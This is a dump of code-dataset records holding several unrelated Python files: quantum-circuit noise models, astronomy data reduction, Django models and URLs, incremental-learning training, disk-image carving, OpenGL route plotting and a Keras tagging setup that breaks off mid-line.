)\"\"\"\n","sub_path":"train_federated.py","file_name":"train_federated.py","file_ext":"py","file_size_in_byte":15192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"504540298","text":"# Copyright 2019 The Cirq Developers\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom typing import Dict, Sequence, TYPE_CHECKING\n\nfrom cirq import devices, value, ops, protocols\n\nfrom cirq.google import engine\n\nif TYPE_CHECKING:\n import cirq\n\n\ndef _homogeneous_moment_is_measurements(moment: 'cirq.Moment') -> bool:\n \"\"\"Whether the moment is nothing but measurement gates.\n\n If a moment is a mixture of measurement and non-measurement gates\n this will throw a ValueError.\n \"\"\"\n cases = {protocols.is_measurement(gate) for gate in moment}\n if len(cases) == 2:\n raise ValueError(\"Moment must be homogeneous: all measurements \"\n \"or all operations.\")\n return True in cases\n\n\nclass DepolarizingNoiseModel(devices.NoiseModel):\n \"\"\"Applies depolarizing noise to each qubit individually at the end of\n every moment.\n\n If a circuit contains measurements, they must be in moments that don't\n also contain gates.\n \"\"\"\n\n def __init__(self, depol_prob: float):\n \"\"\"A depolarizing noise model\n\n Args:\n depol_prob: Depolarizing probability.\n \"\"\"\n value.validate_probability(depol_prob, 'depol prob')\n self.qubit_noise_gate = ops.DepolarizingChannel(depol_prob)\n\n def noisy_moment(self, moment: 'cirq.Moment',\n system_qubits: Sequence['cirq.Qid']):\n if (_homogeneous_moment_is_measurements(moment) or\n self.is_virtual_moment(moment)):\n # coverage: ignore\n return moment\n\n return [\n moment,\n ops.Moment(\n self.qubit_noise_gate(q).with_tags(ops.VirtualTag())\n for q in system_qubits)\n ]\n\n\nclass ReadoutNoiseModel(devices.NoiseModel):\n \"\"\"NoiseModel with probabilistic bit flips preceding measurement.\n\n This simulates readout error. Note that since noise is applied before the\n measurement moment, composing this model on top of another noise model will\n place the bit flips immediately before the measurement (regardless of the\n previously-added noise).\n\n If a circuit contains measurements, they must be in moments that don't\n also contain gates.\n \"\"\"\n\n def __init__(self, bitflip_prob: float):\n \"\"\"A noise model with readout error.\n\n Args:\n bitflip_prob: Probability of a bit-flip during measurement.\n \"\"\"\n value.validate_probability(bitflip_prob, 'bitflip prob')\n self.readout_noise_gate = ops.BitFlipChannel(bitflip_prob)\n\n def noisy_moment(self, moment: 'cirq.Moment',\n system_qubits: Sequence['cirq.Qid']):\n if self.is_virtual_moment(moment):\n return moment\n if _homogeneous_moment_is_measurements(moment):\n return [\n ops.Moment(\n self.readout_noise_gate(q).with_tags(ops.VirtualTag())\n for q in system_qubits), moment\n ]\n return moment\n\n\nclass DampedReadoutNoiseModel(devices.NoiseModel):\n \"\"\"NoiseModel with T1 decay preceding measurement.\n\n This simulates asymmetric readout error. Note that since noise is applied\n before the measurement moment, composing this model on top of another noise\n model will place the T1 decay immediately before the measurement\n (regardless of the previously-added noise).\n\n If a circuit contains measurements, they must be in moments that don't\n also contain gates.\n \"\"\"\n\n def __init__(self, decay_prob: float):\n \"\"\"A depolarizing noise model with damped readout error.\n\n Args:\n decay_prob: Probability of T1 decay during measurement.\n \"\"\"\n value.validate_probability(decay_prob, 'decay_prob')\n self.readout_decay_gate = ops.AmplitudeDampingChannel(decay_prob)\n\n def noisy_moment(self, moment: 'cirq.Moment',\n system_qubits: Sequence['cirq.Qid']):\n if self.is_virtual_moment(moment):\n return moment\n if _homogeneous_moment_is_measurements(moment):\n return [\n ops.Moment(\n self.readout_decay_gate(q).with_tags(ops.VirtualTag())\n for q in system_qubits), moment\n ]\n return moment\n\n\nclass DepolarizingWithReadoutNoiseModel(devices.NoiseModel):\n \"\"\"DepolarizingNoiseModel with probabilistic bit flips preceding\n measurement.\n This simulates readout error.\n If a circuit contains measurements, they must be in moments that don't\n also contain gates.\n \"\"\"\n\n def __init__(self, depol_prob: float, bitflip_prob: float):\n \"\"\"A depolarizing noise model with readout error.\n Args:\n depol_prob: Depolarizing probability.\n bitflip_prob: Probability of a bit-flip during measurement.\n \"\"\"\n value.validate_probability(depol_prob, 'depol prob')\n value.validate_probability(bitflip_prob, 'bitflip prob')\n self.qubit_noise_gate = ops.DepolarizingChannel(depol_prob)\n self.readout_noise_gate = ops.BitFlipChannel(bitflip_prob)\n\n def noisy_moment(self, moment: 'cirq.Moment',\n system_qubits: Sequence['cirq.Qid']):\n if _homogeneous_moment_is_measurements(moment):\n return [\n ops.Moment(self.readout_noise_gate(q) for q in system_qubits),\n moment,\n ]\n return [\n moment,\n ops.Moment(self.qubit_noise_gate(q) for q in system_qubits),\n ]\n\n\nclass DepolarizingWithDampedReadoutNoiseModel(devices.NoiseModel):\n \"\"\"DepolarizingWithReadoutNoiseModel with T1 decay preceding\n measurement.\n This simulates asymmetric readout error. The noise is structured\n so the T1 decay is applied, then the readout bitflip, then measurement.\n If a circuit contains measurements, they must be in moments that don't\n also contain gates.\n \"\"\"\n\n def __init__(\n self,\n depol_prob: float,\n bitflip_prob: float,\n decay_prob: float,\n ):\n \"\"\"A depolarizing noise model with damped readout error.\n Args:\n depol_prob: Depolarizing probability.\n bitflip_prob: Probability of a bit-flip during measurement.\n decay_prob: Probability of T1 decay during measurement.\n Bitflip noise is applied first, then amplitude decay.\n \"\"\"\n value.validate_probability(depol_prob, 'depol prob')\n value.validate_probability(bitflip_prob, 'bitflip prob')\n value.validate_probability(decay_prob, 'decay_prob')\n self.qubit_noise_gate = ops.DepolarizingChannel(depol_prob)\n self.readout_noise_gate = ops.BitFlipChannel(bitflip_prob)\n self.readout_decay_gate = ops.AmplitudeDampingChannel(decay_prob)\n\n def noisy_moment(self, moment: 'cirq.Moment',\n system_qubits: Sequence['cirq.Qid']):\n if _homogeneous_moment_is_measurements(moment):\n return [\n ops.Moment(self.readout_decay_gate(q) for q in system_qubits),\n ops.Moment(self.readout_noise_gate(q) for q in system_qubits),\n moment\n ]\n else:\n return [\n moment,\n ops.Moment(self.qubit_noise_gate(q) for q in system_qubits)\n ]\n\n\nclass PerQubitDepolarizingNoiseModel(devices.NoiseModel):\n \"\"\"DepolarizingNoiseModel which allows depolarization probabilities to be\n specified separately for each qubit.\n\n Similar to depol_prob in DepolarizingNoiseModel, depol_prob_map should map\n Qids in the device to their depolarization probability.\n \"\"\"\n\n def __init__(\n self,\n depol_prob_map: Dict['cirq.Qid', float],\n ):\n \"\"\"A depolarizing noise model with variable per-qubit noise.\n\n Args:\n depol_prob_map: Map of depolarizing probabilities for each qubit.\n \"\"\"\n for qubit, depol_prob in depol_prob_map.items():\n value.validate_probability(depol_prob, f'depol prob of {qubit}')\n self.depol_prob_map = depol_prob_map\n\n def noisy_moment(self, moment: 'cirq.Moment',\n system_qubits: Sequence['cirq.Qid']):\n if (_homogeneous_moment_is_measurements(moment) or\n self.is_virtual_moment(moment)):\n return moment\n else:\n gated_qubits = [\n q for q in system_qubits if moment.operates_on_single_qubit(q)\n ]\n return [\n moment,\n ops.Moment(\n ops.DepolarizingChannel(self.depol_prob_map[q])(q)\n for q in gated_qubits)\n ]\n\n\ndef simple_noise_from_calibration_metrics(calibration: engine.Calibration\n ) -> devices.NoiseModel:\n \"\"\"Creates a reasonable PerQubitDepolarizingNoiseModel using the provided\n calibration data. This object can be retrived from the engine by calling\n 'get_latest_calibration()' or 'get_calibration()' using the ID of the\n target processor.\n \"\"\"\n assert calibration is not None\n rb_data: Dict['cirq.Qid', float] = {\n qubit[0]: depol_prob[0] for qubit, depol_prob in\n calibration['single_qubit_rb_total_error'].items()\n }\n return PerQubitDepolarizingNoiseModel(rb_data)\n","sub_path":"cirq/contrib/noise_models/noise_models.py","file_name":"noise_models.py","file_ext":"py","file_size_in_byte":9839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"512729656","text":"\n# NIRCam specific rountines go here\nimport numpy as np\nfrom importlib import reload\nfrom astropy.io import fits\nfrom eureka.S3_data_reduction import sigrej, optspex\nfrom . import bright2flux as b2f\nreload(b2f)\n\n# Read FITS file from JWST's NIRCam instrument\ndef read(filename, data):\n '''\n Reads single FITS file from JWST's NIRCam instrument.\n\n Parameters\n ----------\n filename : Single filename to read\n data : data object in which the fits data will stored\n returnHdr : Set True to return header files\n\n Returns\n -------\n data : Array of data frames\n err : Array of uncertainty frames\n hdr : List of header files\n master_hdr : List of master header files\n\n History\n -------\n Written by Kevin Stevenson November 2012\n Updated for NIRCam (KBS) May 2021\n\n '''\n assert isinstance(filename, str)\n\n hdulist = fits.open(filename)\n\n # Load master and science headers\n data.mhdr = hdulist[0].header\n data.shdr = hdulist['SCI',1].header\n\n data.intstart = data.mhdr['INTSTART']\n data.intend = data.mhdr['INTEND']\n\n data.data = hdulist['SCI',1].data\n data.err = hdulist['ERR',1].data\n data.dq = hdulist['DQ',1].data\n data.wave = hdulist['WAVELENGTH',1].data\n data.v0 = hdulist['VAR_RNOISE',1].data\n data.int_times = hdulist['INT_TIMES',1].data[data.intstart-1:data.intend]\n\n return data\n\n\ndef unit_convert(data, meta, log):\n if data.shdr['BUNIT'] == 'MJy/sr':\n # Convert from brightness units (MJy/sr) to flux units (uJy/pix)\n # log.writelog('Converting from brightness to flux units')\n # subdata, suberr, subv0 = b2f.bright2flux(subdata, suberr, subv0, shdr['PIXAR_A2'])\n # Convert from brightness units (MJy/sr) to DNs\n log.writelog(' Converting from brightness units (MJy/sr) to electrons')\n meta.photfile = meta.topdir + meta.ancildir + '/' + data.mhdr['R_PHOTOM'][7:]\n data = b2f.bright2dn(data, meta)\n meta.gainfile = meta.topdir + meta.ancildir + '/' + data.mhdr['R_GAIN'][7:]\n data = b2f.dn2electrons(data, meta)\n return data, meta\n\n\ndef flag_bg(data, meta):\n '''\n Outlier rejection of sky background along time axis\n '''\n\n y1, y2, bg_thresh = meta.bg_y1, meta.bg_y2, meta.bg_thresh\n\n bgdata1 = data.subdata[:, :y1]\n bgmask1 = data.submask[:, :y1]\n bgdata2 = data.subdata[:,y2: ]\n bgmask2 = data.submask[:,y2: ]\n bgerr1 = np.median(data.suberr[:, :y1])\n bgerr2 = np.median(data.suberr[:,y2: ])\n estsig1 = [bgerr1 for j in range(len(bg_thresh))]\n estsig2 = [bgerr2 for j in range(len(bg_thresh))]\n\n data.submask[:, :y1] = sigrej.sigrej(bgdata1, bg_thresh, bgmask1, estsig1)\n data.submask[:,y2: ] = sigrej.sigrej(bgdata2, bg_thresh, bgmask2, estsig2)\n\n return data\n\n\ndef fit_bg(data, mask, y1, y2, bg_deg, p3thresh, n, isplots=False):\n '''\n\n '''\n bg, mask = optspex.fitbg(data, mask, y1, y2, deg=bg_deg,\n threshold=p3thresh, isrotate=2, isplots=isplots)\n return (bg, mask, n)\n\n","sub_path":"eureka/S3_data_reduction/nircam.py","file_name":"nircam.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"228488429","text":"from django.urls import path\n\nfrom extenciones.views import ExtensionListadoView, ExtensionCreateView, ExtensionUpdateview, ExtensionListadoViewConsulta, ExtensionView\n\nurlpatterns = [\n # paths del dependencia\n\n path('extension/listado/', ExtensionListadoView.as_view(), name=\"ext_listado\"),\n path('extension/crear/', ExtensionView.as_view(), name=\"ext_extcrear\"),\n path('extension/consulta/',\n ExtensionListadoViewConsulta.as_view(), name=\"ext_consulta\"),\n path('extension/nuevo/', ExtensionCreateView.as_view(), name=\"ext_nuevo\"),\n path('extension/editar/',\n ExtensionUpdateview.as_view(), name=\"ext_editar\"),\n\n]\n","sub_path":"extenciones/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"214766215","text":"\n\nimport os\n\nfrom pytorch_lightning import Trainer, seed_everything\n\nfrom pytorch_lightning.callbacks.early_stopping import EarlyStopping\n# from pl_bolts.callbacks import PrintTableMetricsCallback\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nfrom pytorch_lightning.callbacks.lr_monitor import LearningRateMonitor\n# from pytorch_lightning.callbacks import RichProgressBar\n\n\nfrom pytorch_lightning.loggers import MLFlowLogger\n\n\n\n# from continuum import ClassIncremental\n# from continuum.tasks import split_train_val\n# from continuum.datasets import MNIST, CIFAR10\n\nfrom data.incremental_datamodule import IncrementalDataModule\nfrom data.incremental_scenario import incremental_scenario\n\nfrom learner.Base_learner import Base_learner\n\nfrom args.args_trainer import args_trainer\nfrom args.args_model import args_model\n# print(args_model)\n\n# changhong code\nfrom incremental_net.inc_net import IncrementalNet\ninc_network = IncrementalNet(\"resnet32\", pretrained=False, gradcam=False)\n\nimport sys\n\nseed_everything(42, workers=True)\n\n# model\nlearner = Base_learner(\n inc_network, \n args_model\n)\n\nexp_name = \"incremental_learning\"\nmlflow_logger = MLFlowLogger(experiment_name=exp_name, tracking_uri=\"http://localhost:10500\")\nrun_id = mlflow_logger.run_id\n\n\n\n# callbacks\n# print_table_metrics_callback = PrintTableMetricsCallback()\n\n\nmonitor_metric = 'loss_epoch'\nmode = 'min'\nearly_stop_callback = EarlyStopping(\n monitor=monitor_metric,\n min_delta=0.00,\n patience=3,\n verbose=False,\n mode=mode,\n strict = True)\n\n# checkpoint_callback = ModelCheckpoint(\n# dirpath=f'saved_models/{run_id}/',\n# monitor=monitor_metric,\n# filename='sample-mnist-{epoch:02d}-{val_acc:.2f}',\n# save_top_k=3,\n# mode=mode,\n# save_last=True\n# )\nlearning_rate_monitor_callback = LearningRateMonitor(\n logging_interval='epoch'\n)\n\ntrainer = Trainer(\n accelerator=args_trainer.accelerator,\n gpus = args_trainer.gpus, # [0,1,7,8,9] / -1\n # gpus = \"1\",\n max_epochs=args_trainer.max_epochs,\n progress_bar_refresh_rate=args_trainer.progress_bar_refresh_rate,\n check_val_every_n_epoch = args_trainer.check_val_every_n_epoch,\n weights_summary=args_trainer.weights_summary,\n callbacks = [learning_rate_monitor_callback], # early_stop_callback, checkpoint_callback\n log_every_n_steps = args_trainer.log_every_n_steps, # default: 50\n logger = mlflow_logger,\n sync_batchnorm = args_trainer.sync_batchnorm,\n fast_dev_run = args_trainer.fast_dev_run,\n num_sanity_val_steps = args_trainer.num_sanity_val_steps\n) # precision=16 [checked]\n\n\n\n\n# PATH_DATASETS = \"/data/Public/Datasets\"\n# increment=2\n# initial_increment=2\n\nif trainer.is_global_zero:\n # print(mlflow_logger.run_id)\n print(f' \\\n batch_size: {args_model.batch_size},\\n \\\n learning_rate: {args_model.learning_rate},\\n \\\n dataset: {args_model.dataset},\\n \\\n initial_increment: {args_model.initial_increment}, \\n \\\n increment: {args_model.increment} \\\n ')\n \n ckpt_save_root_dir = 'saved_models/'\n ckpt_save_dir = os.path.join(ckpt_save_root_dir, run_id)\n if not os.path.exists(ckpt_save_dir):\n os.makedirs(ckpt_save_dir)\n \n# mlflow_logger.log_hyperparams(args_model) [checked]\n\n\ninc_scenario = incremental_scenario(\n dataset_name = args_model.dataset,\n train_additional_transforms = [],\n test_additional_transforms = [],\n initial_increment = args_model.initial_increment,\n increment = args_model.increment,\n datasets_dir = args_model.datasets_dir\n)\n# inc_scenario.setup()\ntrain_scenario, test_scenario = inc_scenario.get_incremental_scenarios()\n# print(inc_scenario.class_order)\n\nnb_seen_classes = args_model.initial_increment\n\n\nfor task_id, taskset in enumerate(train_scenario):\n try:\n\n learner.model.update_fc(nb_seen_classes)\n dm = IncrementalDataModule(\n task_id = task_id, \n train_taskset = taskset, \n test_taskset = test_scenario[:task_id+1],\n dims = inc_scenario.dims, \n nb_total_classes = inc_scenario.nb_total_classes,\n batch_size = args_model.batch_size,\n num_workers = args_model.num_workers,\n val_split_ratio = args_model.val_split_ratio)\n\n trainer.fit(learner, datamodule=dm)\n \n # [checked]\n # dm.setup('test')\n # trainer.test(learner, dataloaders=dm.test_dataloader())\n \n if trainer.is_global_zero: # control that only one device can print.\n print('*'*100)\n print(f'nb_seen_classes have been seen is: {nb_seen_classes}')\n \n trainer.save_checkpoint(os.path.join(ckpt_save_dir, f\"{nb_seen_classes}-{learner.last_incremental_acc.item()}.ckpt\"))\n\n learner.update_nb_seen_classes(nb_seen_classes)\n nb_seen_classes += args_model.increment\n\n del dm\n del trainer\n \n trainer = Trainer(\n accelerator=args_trainer.accelerator,\n gpus = args_trainer.gpus, # [0,1,7,8,9] / -1\n # gpus = \"1\",\n max_epochs=args_trainer.max_epochs,\n progress_bar_refresh_rate=args_trainer.progress_bar_refresh_rate,\n check_val_every_n_epoch = args_trainer.check_val_every_n_epoch,\n weights_summary=args_trainer.weights_summary,\n callbacks = [learning_rate_monitor_callback], # early_stop_callback, checkpoint_callback RichProgressBar()\n log_every_n_steps = args_trainer.log_every_n_steps, # default: 50\n logger = mlflow_logger, # use the same logger, otherwise it will create new runs in mlflow.\n sync_batchnorm = args_trainer.sync_batchnorm,\n fast_dev_run = args_trainer.fast_dev_run,\n num_sanity_val_steps = args_trainer.num_sanity_val_steps\n ) # precision=16 [checked]\n except KeyboardInterrupt:\n try:\n break\n sys.exit(0)\n except SystemExit:\n os._exit(0)\n\n# test [worked]\n# dm.setup('test')\n# trainer.test(classifier, dataloaders=dm.test_dataloader())\n# test [not worked]\n# trainer.test(classifier, datamodule=dm)\n\n# 复现\n'''\n 查看iCaRL源代码,看看超参数设置\n 查看pl中有关lr adjust的callback https://pytorch-lightning.readthedocs.io/en/latest/extensions/callbacks.html 都看看\n'''\n\n# 提问,循环程序停止的问题,准备一个minimal example\n\n# 发现trainer.fit 在训练第二个增量开始,只会训练一个epoch,这猜想是和trainer保持不变,存在状态记忆有关。","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"537274930","text":"import sys\n\nN = int(input())\n\nA = list(map(int,input().split()))\n\nnums = []\n\nfor i in range(N):\n nums.append([i,A[i]])\n\nnums.sort(key = lambda x:x[1])\n\ncal = []\n\nfor i in range(N):\n cal.append([nums[i][0],i])\n \ncal.sort(key = lambda x:x[0])\nP = [str(num[1]) for num in cal]\n\nprint(' '.join(P))\n\n","sub_path":"1015 수열 정렬 실버4.py","file_name":"1015 수열 정렬 실버4.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"467297212","text":"\"\"\"\nDefinition of models.\n\"\"\"\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\n\nfrom datetime import datetime\nimport googlemaps\n\n# Create your models here.\n\nclass PermissionLevel(models.Model):\n level = models.IntegerField()\n level_name = models.CharField(max_length=255)\n\n def __str__(self):\n return str(self.level) + ' - ' + self.level_name\n\n\nclass State(models.Model):\n state_name = models.CharField(max_length = 100, default = '')\n abbreviation = models.CharField(max_length = 2, default = '')\n\n def __str__(self):\n return self.state_name;\n\n\nclass Region(models.Model):\n region_name = models.CharField(max_length=255, default = '')\n abbreviation = models.CharField(max_length=6, default = '')\n\n def __str__(self):\n return self.region_name\n \n\nclass District(models.Model):\n district_name = models.CharField(max_length=255, default = '')\n pointman_ID = models.ForeignKey(User)\n region_ID = models.ForeignKey(Region)\n\n def __str__(self):\n return self.district_name\n\n\nclass Troop(models.Model):\n troop_number = models.IntegerField(default = 0)\n state = models.ForeignKey(State)\n district = models.ForeignKey(District)\n admin_ID = models.ManyToManyField(User)\n\n def __str__(self):\n return str(self.troop_number)\n\n\nclass Profile(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n address = models.CharField(max_length = 500, default = '', null=True, blank=True)\n troop_number = models.ForeignKey(Troop, default=0, null=True, blank=True)\n permissions = models.ForeignKey(PermissionLevel, default=0)\n \n def __str__(self):\n return str(self.user.username)\n \n def get_troop(self):\n try:\n t = Troop.objects.get(troop_number=self.troop_number.troop_number)\n return t.troop_number\n except:\n return Troop.objects.get(troop_number=0) #'profile.gettroop error'\n\n def get_district(self):\n try:\n t = Troop.objects.get(troop_number=self.troop_number.troop_number)\n d = District.objects.get(district_name=t.district)\n return d\n except:\n return 'profile.getdistrict error'\n\n def get_district_pk(self):\n try:\n t = Troop.objects.get(troop_number=self.troop_number.troop_number)\n d = District.objects.get(district_name=t.district)\n return int(d.pk)\n except:\n return 'profile.getdistrictpk error'\n\n def get_permissions(self):\n try:\n p = PermissionLevel.objects.get(level=self.permissions.level)\n return p.level\n except:\n return 0\n\n @receiver(post_save, sender=User)\n def create_user_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)\n\n @receiver(post_save, sender=User)\n def save_user_profile(sender, instance, **kwargs):\n instance.profile.save()\n \n \nclass EventType(models.Model):\n name = models.CharField(max_length = 255, default = '')\n description = models.TextField(default = '')\n icon = models.FileField(null=True, blank=True)\n \n def __str__(self):\n return self.name\n\n\nclass Event(models.Model):\n name = models.CharField(max_length = 255)\n description = models.TextField(help_text='Enter a description of the event.')\n event_type = models.ForeignKey(EventType)\n date_start = models.DateTimeField(default = datetime.now)\n date_end = models.DateTimeField(default = datetime.now)\n address = models.CharField(max_length = 500, default = '', help_text='Enter the address of the event')\n coord_x = models.CharField(max_length = 255, default = '', null=True, blank=True)\n coord_y = models.CharField(max_length = 255, default = '', null=True, blank=True)\n google_location = models.CharField(max_length = 300, default = '', null=True, blank=True)\n district = models.ForeignKey(District, default = '0', null=True, blank=True)\n payment_url = models.URLField(default = 'https://www.', null=True, blank=True)\n primary_contact_name = models.CharField(max_length=255, default='')\n primary_contact_info = models.CharField(max_length=255, default='', help_text='(123) 333-4445')\n primary_contact_info_type = models.IntegerField(null=True, blank=True)\n creation_date = models.DateTimeField(default = datetime.now)\n creation_user = models.ForeignKey(User, null=True, blank=True)\n\n def __str__(self):\n return self.name;\n\n def get_absolute_url(self):\n url = '/event/' + str(self.id)\n return u'%s' % (url, str(self.name))\n\n def get_troop(self):\n #u = self.creation_user\n #t = Troop.objects.get(troop_number=u.profile.get_troop())\n #return t.troop_number\n\n try:\n t = Troop.objects.get(troop_number=self.creation_user.profile.troop_number.troop_number)\n return t.troop_number\n except:\n return Troop.objects.get(troop_number=0) #'event.gettroop error'\n\n\nclass SearchEvent(models.Model):\n name = models.CharField(max_length = 255, blank=True, null=True)\n description = models.CharField(max_length=255, default = '', blank=True, null=True)\n event_type = models.ForeignKey(EventType, blank=True, null=True)\n date_start = models.DateField(default = '', blank=True, null=True)\n district = models.ForeignKey(District, blank=True, null=True)\n primary_contact_ID = models.ForeignKey(User, blank=True, null=True)\n\n\nclass ListEvent(models.Model):\n event_type = models.ForeignKey(EventType, blank=True, null=True)\n date_start = models.DateField(default = '', blank=True, null=True)\n district = models.ForeignKey(District, blank=True, null=True)\n\n\nclass autofill(models.Model):\n address = models.CharField(max_length=400)","sub_path":"SeniorProject_v01/app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"277150645","text":"#!/usr/bin/env python3\nfrom struct import *\nimport os\n\nore = (2048*512, 59392*512) # (starr,length) cut gpt\ncl_size = 4096\nat_size = cl_size * 4 # AllocationTable\nde_size = 32 # Directory entory\n\nwith open(\"raw.dmg\",\"rb\") as raw:\n raw.seek(ore[0])\n with open(\"OreNoFS.bin\",\"wb\") as f:\n f.write(raw.read(ore[1]))\n\nwith open(\"OreNoFS.bin\",\"rb\") as at:\n with open(\"at.bin\",\"wb\") as f:\n f.write(at.read(at_size))\n with open(\"de.bin\",\"wb\") as f:\n f.write(at.read(de_size))\n\nwith open(\"de.bin\",\"rb\") as de:\n de.seek(1)\n print(\"file_name: {}\".format(de.read(8)))\n de.seek(12)\n file_size = unpack(' maxX :\n maxX = x\n if y > maxY :\n maxY = y\n if x < minX :\n minX = x\n if y < minY :\n minY = y\n \n # Mengubah koordinat berdasarkan skala yang didapat\n num_scale = max(maxX - minX, maxY - minY)\n for node in dataNode :\n x = dataNode[node][0]\n y = dataNode[node][1]\n\n newX = x / num_scale\n newY = y / num_scale\n dataNode[node] = (newX, newY, 0)\n\n\ndef map(dest):\n \n radius = 0.001\n \n for node in dataNode :\n posx, posy = dataNode[node][0], dataNode[node][1]\n glBegin(GL_POLYGON)\n \n # Membedakan warna antara titik tujuan dan titik yang bukan tujuan salesman\n if node in dest :\n glColor3f(1, 1, 0)\n else :\n glColor3f(1,0,1)\n \n # Membentuk kotak yang menandakan suatu titik pada peta\n glVertex2f(posx+radius,posy+radius)\n glVertex2f(posx+radius,posy-radius)\n glVertex2f(posx-radius,posy-radius)\n glVertex2f(posx-radius,posy+radius)\n glEnd()\n \ndef route_line(solution_routes) :\n # Melakukan pencetakan rute dari jalan yang dilalui oleh tiap salesman\n color = [1,0,0]\n i = 0\n for routes in solution_routes :\n glBegin(GL_LINES)\n glColor3f(color[0], color[1], color[2])\n\n for route in routes :\n path = route[2]\n for pair in path :\n start, end = pair[0], pair[1]\n glVertex2f(dataNode[start][0], dataNode[start][1])\n glVertex2f(dataNode[end][0], dataNode[end][1])\n\n glEnd()\n # Melakukan pengubahan warna rute untuk tiap salesman yang berbeda\n i += 1\n color[i % 3] += 1\n \n\ndef mouseMove(event) :\n # Melakukan zoom in berdasarkan pergerakan mousewheel\n # Zoom dilakukan dengan memanfaatkan scaling pada sumbu x,y, dan z\n if event.type == pygame.MOUSEBUTTONDOWN and event.button == 4: # wheel rolled up\n glScaled(1.05, 1.05, 1.05)\n elif event.type == pygame.MOUSEBUTTONDOWN and event.button == 5: # wheel rolled down\n glScaled(0.95, 0.95, 0.95)\n\ndef printSolutions(solutions) :\n # Mencetak total jarak pada solusi dari tiap salesman, dan mencetak total jarak yang dilalui seluruh salesman\n sum = 0\n for i in range(len(solutions)) :\n sum += solutions[i]\n print(\"Solution route for salesman \" + str(i+1) + \" : \" + str(solutions[i]))\n \n print(\"Total solution : \" + str(sum))\n\ndef main(dest, solution_routes):\n pygame.init()\n \n display = (w,h)\n pygame.display.set_mode(display, DOUBLEBUF|OPENGL, RESIZABLE)\n\n # Setting posisi dan perspektif dari objek yang di visualisasi\n gluPerspective(45, (1.0*display[0]/display[1]), 0.1, 50.0)\n glTranslatef(-0.5,-0.5, -1.5)\n \n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n \n # Melakukan perpindahan menggunakan arrow up, down, left, right pada keyboard\n \n if event.type == pygame.KEYDOWN :\n if event.key == pygame.K_LEFT :\n glTranslatef(0.1,0,0)\n if event.key == pygame.K_RIGHT :\n glTranslatef(-0.1,0,0)\n if event.key == pygame.K_UP :\n glTranslatef(0,-0.1,0)\n if event.key == pygame.K_DOWN :\n glTranslatef(0,+0.1,0)\n \n # melakukan zoom berdasarkan mousewheel event\n mouseMove(event)\n\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n\n map(dest)\n route_line(solution_routes)\n\n pygame.display.flip()\n pygame.time.wait(30)\n\n\nif __name__ == '__main__' : \n city = input(\"Masukkan nama kota : \")\n dataNode = buildDataNode(city)\n dataEdge = buildDataEdge(city)\n solutions, solution_routes, dest = solve(dataNode, dataEdge)\n scale()\n w,h= 1000,1000\n printSolutions(solutions)\n main(dest, solution_routes)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"598593890","text":"import numpy as np\nimport codecs\nfrom keras.models import Sequential\nfrom keras.layers.recurrent import LSTM\nfrom keras.layers.core import TimeDistributedDense, Activation\nfrom keras.preprocessing.sequence import pad_sequences\nfrom keras.layers.embeddings import Embedding\nfrom keras.layers import Dropout\nfrom sklearn.metrics import confusion_matrix, accuracy_score, precision_recall_fscore_support, classification_report\nimport keras\nfrom collections import Counter\n\nfrom sklearn.preprocessing import LabelBinarizer\nimport gc\nimport nltk\nimport sys\nimport os\n#### READ GLOVE ####\n\n# Read GloVe Embedding\nBASE_DIR = '.'\nGLOVE_DIR = BASE_DIR + '/GLOVE/'\n#EMBEDDING_DIM = 100 # Embedding dimensions\n\nembeddings_index = {}\nf = open(os.path.join(GLOVE_DIR, 'glove.6B.100d.txt'))\nfor line in f:\n values = line.split() #Tokenizer\n word = values[0] # word form\n coefs = np.asarray(values[1:], dtype='float32') # embedding coefficients\n embeddings_index[word] = coefs\nf.close()\n\nprint('Number of embeddings:', len(embeddings_index))\nprint('Ten first element from `the` Embedding Vector :', embeddings_index[\"the\"][:10])\n\n#### SEQUENCE SEGMENTATION ####\n#def chunker(seq, size):\n# return (seq[pos:pos + size] for pos in range(0, len(seq), size))\ndef chunker(seq, size, is_y=False):\n size = size-1\n if is_y:\n return ([\"O\"] + seq[pos:pos + size] for pos in range(0, len(seq), size))\n else:\n return (seq[pos:pos + size] + [\"\"] for pos in range(0, len(seq), size))\n\ndef score(yh, pr):\n coords = [np.where(yhh >= 0)[0][0] for yhh in yh]\n yh = [yhh[co:] for yhh, co in zip(yh, coords)]\n ypr = [prr[co:] for prr, co in zip(pr, coords)]\n fyh = [c for row in yh for c in row]\n fpr = [c for row in ypr for c in row]\n return fyh, fpr\n\ndef encode(x, n):\n result = np.zeros(n)\n result[x] = 1\n return result\n\nchunk_size = 